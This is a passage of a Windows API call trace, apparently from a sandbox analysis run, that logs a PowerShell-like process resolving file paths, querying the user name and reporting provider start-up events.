lpFileInformation=0xcd1f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.238] SetErrorMode (uMode=0x1) returned 0x1 [0136.239] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.239] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.239] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.239] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.239] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.240] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.240] SetErrorMode (uMode=0x1) returned 0x1 [0136.240] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.240] SetErrorMode (uMode=0x1) returned 0x1 [0136.240] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.240] SetErrorMode (uMode=0x1) returned 0x1 [0136.240] GetFileAttributesExW (in: 
lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.240] SetErrorMode (uMode=0x1) returned 0x1 [0136.240] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.241] SetErrorMode (uMode=0x1) returned 0x1 [0136.241] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd0c0 | out: lpFileInformation=0xcd0c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.241] SetErrorMode (uMode=0x1) returned 0x1 [0136.241] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.241] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.241] CoTaskMemFree (pv=0x1b825410) [0136.241] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.241] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.242] CoTaskMemFree (pv=0x14d180) [0136.242] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x366ff30*="FileSystem", lpRawData=0x366fcc0) returned 1 [0136.243] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.243] 
GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.243] CoTaskMemFree (pv=0x10c990) [0136.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.244] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.244] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.244] CoTaskMemFree (pv=0x1b825410) [0136.244] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.244] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.245] CoTaskMemFree (pv=0x14d180) [0136.245] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, 
lpStrings=0x3675750*="Function", lpRawData=0x36754e0) returned 1 [0136.246] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.247] CoTaskMemFree (pv=0x10c990) [0136.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.290] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.293] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.293] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.294] CoTaskMemFree (pv=0x1b825410) [0136.294] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.294] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.294] CoTaskMemFree (pv=0x14d180) [0136.296] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3697f58*="Registry", lpRawData=0x3697ce8) returned 1 [0136.301] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.302] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.302] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.303] CoTaskMemFree (pv=0x1b825410) [0136.303] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.303] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.304] CoTaskMemFree (pv=0x14d180) [0136.305] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x369d350*="Variable", lpRawData=0x369d0e0) returned 1 [0136.310] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | 
out: lpBuffer="") returned 0x0 [0136.310] CoTaskMemFree (pv=0x10c990) [0136.330] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.330] CoTaskMemFree (pv=0x10c990) [0136.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0136.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0136.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0136.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0136.388] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.388] GetUserNameExW (in: NameFormat=0x2, 
lpNameBuffer=0x1b825410, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.388] CoTaskMemFree (pv=0x1b825410) [0136.388] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.388] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.389] CoTaskMemFree (pv=0x14d180) [0136.389] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x36b0f48*="Certificate", lpRawData=0x36b0cd8) returned 1 [0136.395] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.395] CoTaskMemFree (pv=0x10c990) [0136.398] GetLogicalDrives () returned 0x4 [0136.398] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.399] CoTaskMemAlloc (cb=0x20e) returned 0x15bfe0 [0136.399] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x15bfe0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop") returned 0x1f [0136.399] CoTaskMemFree (pv=0x15bfe0) [0136.401] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.401] CoTaskMemFree (pv=0x10c990) [0136.401] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.401] CoTaskMemFree (pv=0x10c990) [0136.412] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.412] CoTaskMemFree (pv=0x10c990) [0136.415] 
CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.415] CoTaskMemFree (pv=0x10c990) [0136.416] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.416] SetErrorMode (uMode=0x1) returned 0x1 [0136.416] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.416] SetErrorMode (uMode=0x1) returned 0x1 [0136.416] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.416] SetErrorMode (uMode=0x1) returned 0x1 [0136.416] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.417] SetErrorMode (uMode=0x1) returned 0x1 [0136.417] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.417] 
GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.417] CoTaskMemFree (pv=0x10c990) [0136.431] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcd050, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.432] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.432] SetErrorMode (uMode=0x1) returned 0x1 [0136.432] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.432] SetErrorMode (uMode=0x1) returned 0x1 [0136.432] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.432] SetErrorMode (uMode=0x1) returned 0x1 [0136.432] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6a527350, ftLastAccessTime.dwHighDateTime=0x1d39bfa, ftLastWriteTime.dwLowDateTime=0x6a527350, ftLastWriteTime.dwHighDateTime=0x1d39bfa, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.432] SetErrorMode (uMode=0x1) returned 0x1 [0136.433] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) 
returned 0x3 [0136.433] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0136.433] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.433] SetErrorMode (uMode=0x1) returned 0x1 [0136.433] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf068ee40, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf068ee40, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0136.433] SetErrorMode (uMode=0x1) returned 0x1 [0136.433] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.433] SetErrorMode (uMode=0x1) returned 0x1 [0136.433] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf068ee40, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf068ee40, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0136.434] SetErrorMode (uMode=0x1) returned 0x1 [0136.434] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.434] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0136.434] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.434] SetErrorMode (uMode=0x1) returned 0x1 [0136.434] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.434] SetErrorMode (uMode=0x1) returned 0x1 [0136.434] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.434] SetErrorMode (uMode=0x1) returned 0x1 [0136.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.435] SetErrorMode (uMode=0x1) returned 0x1 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\.", nBufferLength=0x105, 
lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.435] SetErrorMode (uMode=0x1) returned 0x1 [0136.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd0d0 | out: lpFileInformation=0xcd0d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.435] SetErrorMode (uMode=0x1) returned 0x1 [0136.436] GetFullPathNameW (in: 